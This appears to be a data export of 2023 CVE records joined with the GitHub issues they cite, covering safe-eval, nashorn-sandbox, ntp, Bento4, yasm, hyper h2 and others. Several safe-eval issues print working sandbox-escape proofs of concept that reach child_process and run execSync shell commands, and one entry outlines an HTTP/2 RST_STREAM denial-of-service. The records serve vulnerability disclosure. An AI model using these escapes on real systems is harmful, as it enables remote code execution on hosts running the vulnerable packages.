[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/javadelight/delight-nashorn-sandbox/issues/135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:javadelight:nashorn_sandbox:0.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "36B6F6D6-AB93-4DE2-944B-40499DA0AE1C", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "74" ]
74
https://github.com/javadelight/delight-nashorn-sandbox/issues/135
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "javadelight", "delight-nashorn-sandbox" ]
When `allowExitFunctions `is set to false, we can use the `loadWithNewGlobal `function to invoke the `exit `and `quit `methods to exit the Java process. Code and the POC: NashornSandbox sandbox = NashornSandBoxes.create(); sandbox.allowLoadFunctions(true); sandbox.allowExitFunctions(false); // POC `sandbox.eval...
When allowExitFunctions is set to false, we can use the loadWithNewGlobal function to invoke the exit and quit methods to exit the Java process.
https://api.github.com/repos/javadelight/delight-nashorn-sandbox/issues/135/comments
5
2023-02-13T13:11:52Z
2023-04-21T22:33:18Z
https://github.com/javadelight/delight-nashorn-sandbox/issues/135
1,582,330,345
135
4,960
CVE-2023-26121
2023-04-11T05:15:07.127
All versions of the package safe-eval are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/9d9fc0cc5b7b130419cd45827e59c4f9" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
Hellow, we found sandbox escape vulnerability in the latest version of safe-eval ``` var safeEval = require('safe-eval') let code = ` (function() { Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a); ret = (new Error()).stack; ret.__proto__.polluted = "ret...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/28/comments
0
2023-01-02T03:06:06Z
2023-01-02T03:06:06Z
https://github.com/hacksparrow/safe-eval/issues/28
1,515,980,994
28
4,961
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
We found sandbox escape vulnerability in the latest version of safe-eval (node v18.12.1) POC : ``` const safe_eval = require('safe-eval') code = ` import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch rce') ` safe_eval(code) ``` ...
Sandbox Escape
https://api.github.com/repos/hacksparrow/safe-eval/issues/27/comments
1
2022-12-21T07:48:21Z
2022-12-31T18:39:32Z
https://github.com/hacksparrow/safe-eval/issues/27
1,505,853,538
27
4,962
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/31
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
```javascript // node version: 19.8.1 var safeEval = require('safe-eval') let code = ` (function() { function stack() { new Error().stack; stack(); } try { stack(); } catch (pp) { pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('to...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/31/comments
0
2023-03-26T07:59:40Z
2023-03-26T08:19:31Z
https://github.com/hacksparrow/safe-eval/issues/31
1,640,811,892
31
4,963
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
```javascript // node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ __defineGetter__("x", ); } catch(ret){ ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); }} )() ` ...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/32/comments
0
2023-03-26T08:21:34Z
2023-03-26T08:21:34Z
https://github.com/hacksparrow/safe-eval/issues/32
1,640,817,969
32
4,964
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
```javascript // node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ toLocaleString() } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/33/comments
0
2023-03-27T12:33:07Z
2023-03-27T12:33:07Z
https://github.com/hacksparrow/safe-eval/issues/33
1,642,017,980
33
4,965
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
```javascript // node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } })() ` ...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/34/comments
1
2023-03-27T12:56:53Z
2025-04-07T03:58:46Z
https://github.com/hacksparrow/safe-eval/issues/34
1,642,022,501
34
4,966
CVE-2023-26122
2023-04-11T05:15:07.180
All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE"). **Vulnerable functions:** __defineGetter__, stack(), toLocaleStrin...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:safe-eval_project:safe-eval:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "CD03CFC7-7F8B-4C4F-AAC0-F3924E4EAB65", "versionEndExcluding": null, "versionEndIncluding": "0.4.1", "v...
[ "1321" ]
1321
https://github.com/hacksparrow/safe-eval/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hacksparrow", "safe-eval" ]
```javascript // node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() { try{ valueOf() } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } })() ` ...
Sandbox Escape Bug
https://api.github.com/repos/hacksparrow/safe-eval/issues/35/comments
0
2023-03-27T13:05:25Z
2023-03-27T13:05:25Z
https://github.com/hacksparrow/safe-eval/issues/35
1,642,023,896
35
4,967
CVE-2023-26917
2023-04-11T12:15:07.657
libyang from v2.0.164 to v2.1.30 was discovered to contain a NULL pointer dereference via the function lysp_stmt_validate_value at lys_parse_mem.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CESNET/libyang/issues/1987" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CESNET/l...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "45E8D3A2-7CA5-4C1C-B0EB-6AD5BC13D455", "versionEndExcluding": null, "versionEndIncluding": "2.1.30", "versionStartExcludi...
[ "476" ]
476
https://github.com/CESNET/libyang/issues/1987
[ "Exploit", "Issue Tracking" ]
github.com
[ "CESNET", "libyang" ]
Hello, I find a null pointer derefence error in `lysp_stmt_validate_value()` when I try to fuzz libyang via `lys_parse_mem.c `. In function `lysp_stmt_validate_value()`, it doesn't check whether the value of `val` is NULL. In some cases, it can be NULL, which leads to the operation of `while ( *val )` in line 390 that ...
`lysp_stmt_validate_value`: NULL pointer dereference via `lys_parse_mem`
https://api.github.com/repos/CESNET/libyang/issues/1987/comments
3
2023-02-25T14:09:15Z
2023-04-11T15:30:46Z
https://github.com/CESNET/libyang/issues/1987
1,599,720,374
1,987
4,968
CVE-2023-26964
2023-04-11T14:15:07.677
An issue was discovered in hyper v0.13.7. h2-0.2.4 Stream stacking occurs when the H2 component processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high which can lead to a Denial of Service (DoS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/hyperium/hyper/issues/2877" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/mess...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hyper:h2:0.2.4:*:*:*:*:rust:*:*", "matchCriteriaId": "54D7E5A6-2BD2-423F-B2BF-0A6A801C9AAF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "770" ]
770
https://github.com/hyperium/hyper/issues/2877
[ "Exploit", "Issue Tracking" ]
github.com
[ "hyperium", "hyper" ]
**Version** hyper-0.13.7 h2-0.2.4 **Platform** wsl **Description** **Summary:** ​ Stream stacking occurs when Hyper processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high. **Step:** 1. Send an `HEADERS` frame to open the stream, followed by an `RST_STREAM` frame to reques...
Stream stacking occurs when H2 processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high.
https://api.github.com/repos/hyperium/hyper/issues/2877/comments
32
2022-05-27T15:39:13Z
2023-04-13T17:26:42Z
https://github.com/hyperium/hyper/issues/2877
1,250,904,722
2,877
4,969
CVE-2023-23277
2023-04-11T15:15:10.463
Snippet-box 1.0.0 is vulnerable to Cross Site Scripting (XSS). Remote attackers can render arbitrary web script or HTML from the "Snippet code" form field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/go-compile/security-advisories/blob/master/CVE-2023-23277.pdf" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/pawelmalak/snippet-box" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:snippet_box_project:snippet_box:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4605EE8-CAAB-4C06-9DA0-6F9A0F829713", "versionEndExcluding": null, "versionEndIncluding": null, "ve...
[ "79" ]
79
https://github.com/pawelmalak/snippet-box/issues/57
[ "Exploit", "Issue Tracking" ]
github.com
[ "pawelmalak", "snippet-box" ]
# XSS/Cross Site Scripting Vulnerability Vulnerability: **XSS** Severity: **VERY HIGH** Image: `pawelmalak/snippet-box:arm` Digest: `sha256:ba9245cc339d159588c76b33f0ae708f5c1af68a27f876561b8b84ed5b8ee288` Why this is a problem: Snippet-box doesn't have authentication, allowing anyone to perform this attack. F...
security: XSS vulnerability (CVE-2023-23277)
https://api.github.com/repos/pawelmalak/snippet-box/issues/57/comments
2
2023-01-08T16:07:29Z
2023-02-28T16:28:39Z
https://github.com/pawelmalak/snippet-box/issues/57
1,524,571,214
57
4,970
CVE-2023-26551
2023-04-11T21:15:21.617
mstolfp in libntp/mstolfp.c in NTP 4.2.8p15 has an out-of-bounds write in the cp<cpdec while loop. An adversary may be able to attack a client ntpq process, but cannot attack ntpd.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/spwpun/ntp-4.2.8p15-cves/blob/main/CVE-2023-26551" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/spwpun/ntp-4.2.8p15-cves/issue...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ntp:ntp:4.2.8:p15:*:*:*:*:*:*", "matchCriteriaId": "D300A755-9809-4469-8C08-20CB451C83A2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#issuecomment-1506667321
[ "Third Party Advisory" ]
github.com
[ "spwpun", "ntp-4.2.8p15-cves" ]
- The first four of these CVEs affect a function in libntp that is only used by ntpq, but not by ntpd. - The last CVE affects the driver for a hardware clock (GPS receiver), so ntpd might be vulnerable to manipulated devices of that type, but not to remote attacks.
ntpd is not vulnerable
https://api.github.com/repos/spwpun/ntp-4.2.8p15-cves/issues/1/comments
24
2023-04-12T21:23:31Z
2023-06-06T10:07:27Z
https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1
1,665,282,791
1
4,971
CVE-2023-26555
2023-04-11T21:15:21.830
praecis_parse in ntpd/refclock_palisade.c in NTP 4.2.8p15 has an out-of-bounds write. Any attack method would be complex, e.g., with a manipulated GPS receiver.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/spwpun/ntp-4.2.8p15-cves/blob/main/CVE-2023-26555" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ntp:ntp:4.2.8:p15:*:*:*:*:*:*", "matchCriteriaId": "D300A755-9809-4469-8C08-20CB451C83A2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "787" ]
787
https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1#issuecomment-1506546409
[ "Issue Tracking" ]
github.com
[ "spwpun", "ntp-4.2.8p15-cves" ]
- The first four of these CVEs affect a function in libntp that is only used by ntpq, but not by ntpd. - The last CVE affects the driver for a hardware clock (GPS receiver), so ntpd might be vulnerable to manipulated devices of that type, but not to remote attacks.
ntpd is not vulnerable
https://api.github.com/repos/spwpun/ntp-4.2.8p15-cves/issues/1/comments
24
2023-04-12T21:23:31Z
2023-06-06T10:07:27Z
https://github.com/spwpun/ntp-4.2.8p15-cves/issues/1
1,665,282,791
1
4,972
CVE-2023-29576
2023-04-11T21:15:30.510
Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_TrunAtom::SetDataOffset(int) function in Ap4TrunAtom.h.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/844" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://git...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "125" ]
125
https://github.com/axiomatic-systems/Bento4/issues/844
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hello, I found SEGV bug in Ap4TrunAtom.h # BUG SEGV /home/ubuntu/fuzz/asan_bento4/Bento4/Source/C++/Core/Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int) # Build ubuntu 20.04 ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsanitize=a...
SEGV Ap4TrunAtom.h:80:80 in AP4_TrunAtom::SetDataOffset(int)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/844/comments
0
2023-03-14T12:42:26Z
2024-02-17T17:48:33Z
https://github.com/axiomatic-systems/Bento4/issues/844
1,623,402,397
844
4,973
CVE-2023-30512
2023-04-12T06:15:07.580
CubeFS through 3.2.1 allows Kubernetes cluster-level privilege escalation. This occurs because DaemonSet has cfs-csi-cluster-role and can thus list all secrets, including the admin secret.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/cubefs/cubefs/issues/1882" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mitigation", "Thi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:cubefs:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2F0AB22-1991-4482-B099-06E0D9A11629", "versionEndExcluding": null, "versionEndIncluding": "3.2.1", "versionStart...
[ "732" ]
732
https://github.com/cubefs/cubefs/issues/1882
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "cubefs", "cubefs" ]
Dear cubefs maintainers: I am Nanzi Yang, and I find a potential risk in cubefs that can be leveraged to make cluster-level privilege escalation. Detailed analysis: 1. The cubefs has one DaemonSet "cfs-csi-node", which runs pods on each node of a Kubernetes cluster. And the cubefs has one deployment "cfs-csi-contr...
[Bug]: A potential risk in kubefs which can be leveraged to make a cluster-level privilege escalation
https://api.github.com/repos/cubefs/cubefs/issues/1882/comments
6
2023-04-09T13:42:14Z
2023-11-15T01:49:04Z
https://github.com/cubefs/cubefs/issues/1882
1,659,880,248
1,882
4,974
CVE-2023-29574
2023-04-12T13:15:07.637
Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42avc component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/841" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "119" ]
119
https://github.com/axiomatic-systems/Bento4/issues/841
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hello, I found out-of-memory bug in mp42avc # BUG out-of-memory (/home/ubuntu/fuzz/asan_bento4/Bento4/cmakebuild/mp42avc+0x4c44dd) in operator new(unsigned long) # Build ubuntu 20.04 ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsanitize=...
out-of-memory in mp42avc
https://api.github.com/repos/axiomatic-systems/Bento4/issues/841/comments
1
2023-03-14T02:40:15Z
2024-02-17T17:49:29Z
https://github.com/axiomatic-systems/Bento4/issues/841
1,622,623,759
841
4,975
CVE-2023-29580
2023-04-12T13:15:07.727
yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/215" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/z...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*", "matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "653" ]
653
https://github.com/yasm/yasm/issues/215
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
# SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create ## project address https://github.com/yasm/yasm ## info OS:Ubuntu20.04 TLS Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./config...
SEGV yasm/libyasm/expr.c:87:44 in yasm_expr_create
https://api.github.com/repos/yasm/yasm/issues/215/comments
1
2023-03-31T07:56:32Z
2024-03-21T12:41:09Z
https://github.com/yasm/yasm/issues/215
1,648,868,122
215
4,976
CVE-2023-29571
2023-04-12T15:15:13.233
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via gc_sweep at src/mjs_gc.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/241" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "119" ]
119
https://github.com/cesanta/mjs/issues/241
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
